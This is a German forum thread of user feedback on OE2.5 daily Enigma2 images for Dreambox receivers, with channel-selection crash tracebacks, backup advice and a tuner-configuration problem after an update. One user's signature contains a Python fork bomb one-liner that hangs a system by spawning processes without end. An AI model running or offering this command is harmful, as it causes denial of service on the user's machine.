Pinned OE2.5: Rückmeldungen zum daily Image für DM520/DM525/DM820 und DM7080

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • Hier immer GS auf der 7080 wenn ein Kanal/Sender aus der Kanalliste/Senderliste ausgewählt wird. Bevor enigma 4.3.1r24 war alles i.O. Habe es auch schon bei DP gepostet.
      Nutze letzte newnigma2 image und default skin.

      Es passiert wenn ich in der Senderliste einen (anderen) Sender wähle (mir dem Cursor) und dann auf der OK-Taste drücke.
      In der E2 Log steht u.a.:

      Display Spoiler

      Traceback (most recent call last):
      File "/usr/lib/enigma2/python/enigma.py", line 7783, in __call__
      return ret(*args, **kwargs)
      File "/usr/lib/enigma2/python/Components/ActionMap.py", line 63, in action
      res = self.actions[action]()
      File "/usr/lib/enigma2/python/Plugins/Extensions/pipzap/plugin.py", line 86, in ChannelSelection_channelSelected
      baseMethods.ChannelSelection_channelSelected(self, *args, **kwargs)
      File "/usr/lib/enigma2/python/Screens/ChannelSelection.py", line 1404, in channelSelected
      self.zap(True)
      File "/usr/lib/enigma2/python/Plugins/Extensions/pipzap/plugin.py", line 138, in ChannelSelection_zap
      baseMethods.ChannelSelection_zap(self, *args, **kwargs)
      File "/usr/lib/enigma2/python/Screens/ChannelSelection.py", line 1417, in zap
      if ref is None or ref != nref or forced:
      TypeError: in method 'eServiceReference___ne__', argument 2 of type 'eServiceReference const &'


      Was könnte da los sein....?

      Kann alte ChannelSelection.py versuchen, aber glaube nicht daß das die Absicht ist.
      Kann doch auch nicht sein, daß ich schon wieder neu flashen muß und wieder alle Erweiterungen neu instalieren, usw.
      Files
    • ni_hao wrote:

      Kann doch auch nicht sein, daß ich schon wieder neu flashen muß und wieder alle Erweiterungen neu instalieren, usw
      Das kannst du dir sparen, indem du regelmässig ein Voll-Backup anlegst. Ist doch innerhalb von ein paar Minuten erledigt.
      Yamp - gepimte Version auch für FHD - aktuelle Version V3.2.2 hier
    • Hilfsbereit wrote:

      Ich würde mal testweise das pipzap plugin deinstallieren, und dann noch mal testen.
      hat leider nichts gebracht :(
      Display Spoiler

      0x716f70 <eRCInput::keyPressed(eRCKey const&)+0x130>
      0x719068 <eRCDeviceInputDev::handleCode(long)+0xec>
      0x71592c <eRCInputEventDriver::keyPressed(int)+0x98>
      0x4de290 <eSocketNotifier::activate(int)+0x150>
      0x4e03dc <eMainloop_native::processOneEvent(int)+0xc0c>
      0x7583a0 <eMainloopQt::processEvents(QFlags<QEventLoop::ProcessEventsFlag>)+0xdc>
      0x75c157a8 <QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>)+0x140>
      0x75c20648 <QCoreApplication::exec()+0xb0>
      0x758284 <eMainloopQt::runLoop()+0x38>
      0x7602e8 </usr/bin/enigma2()>
      0x7549aa9c </usr/lib/libpython2.7.so.1.0(PyEval_EvalFrameEx+0x547c)>


      Traceback (most recent call last):
      File "/usr/lib/enigma2/python/enigma.py", line 7783, in __call__
      return ret(*args, **kwargs)
      File "/usr/lib/enigma2/python/Components/ActionMap.py", line 63, in action
      res = self.actions[action]()
      File "/usr/lib/enigma2/python/Screens/ChannelSelection.py", line 1404, in channelSelected
      self.zap(True)
      File "/usr/lib/enigma2/python/Screens/ChannelSelection.py", line 1417, in zap
      if ref is None or ref != nref or forced:
      TypeError: in method 'eServiceReference___ne__', argument 2 of type 'eServiceReference const &'
    • AlfredENeumann wrote:

      ni_hao wrote:

      Kann doch auch nicht sein, daß ich schon wieder neu flashen muß und wieder alle Erweiterungen neu instalieren, usw
      Das kannst du dir sparen, indem du regelmässig ein Voll-Backup anlegst. Ist doch innerhalb von ein paar Minuten erledigt.
      Wieso sparen wenn ich ein Voll-Backup zurück setzen soll, dann sind doch alle Fehler wieder drinn.
    • ni_hao wrote:

      Wieso sparen wenn ich ein Voll-Backup zurück setzen soll, dann sind doch alle Fehler wieder drinn
      Du sollst deine Backups auch machen, BEVOR du Fehler drin hast. So könnte man "regelmässig" auch interpretieren... ;) Und es ist auch nicht strafbar, wenn man mehrere Backups behält.
      Yamp - gepimte Version auch für FHD - aktuelle Version V3.2.2 hier
    • AlfredENeumann wrote:

      Du sollst deine Backups auch machen, BEVOR du Fehler drin hast. So könnte man "regelmässig" auch interpretieren... ;) Und es ist auch nicht strafbar, wenn man mehrere Backups behält.
      Pfff...LOL, da nutzt doch nichts denn hier werden jede Nacht backups gemacht und aufbewahrt. Habe doch geschrieben, daß bevor r24 alles i.O. ist. Also letzte backup mit r23 zurück setzen, dann upgrade machen und... siehe da ist den Fehler/GS wieder....
    • Joey wrote:

      Wenn du dieses "Machwerk" von Skin wieder installierst und wieder Probleme hast, wird der Support hier schnell zu Ende sein. Das Ding greift so tief ins System ein und verbiegt so viele Sachen, dass es einen Support unmöglich macht.
      Mehr kann man dazu nicht sagen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ich habe habe heute morgen auf der DM525 das Update auf 4.3.1r25 gemacht.
      Ging soweit alles fehlerfrei durch, nur danach war die Tunerkonfiguration zerschossen, ich hatte in meiner Kanallliste nur <n/a> stehen, und in der Tunerkonfiguration war Astra 19.2 nicht mehr eingestellt.
      Das hab ich gemacht, eine automatische Kanalsuche gemacht, und ich hatte ca. 600 Sender (von ehemals knapp 1450 Sendern) gefunden. Aber es war immer "Tunen fehlgeschlagen".
      Dann hab ich eine neue satelittes.xml kopiert, aber auch danach hat sich nichts geändert. Was im Endeffekt geholfen hatte, war die Tunerkonfiguration wieder händisch auf 19.2 zu stellen, und ein Backup meiner Kanallisten einzuspielen. Seitdem geht's wieder.

      Hatte jemand sowas nach dem Update mal? Würde mich interessieren, was da schiefgelaufen ist.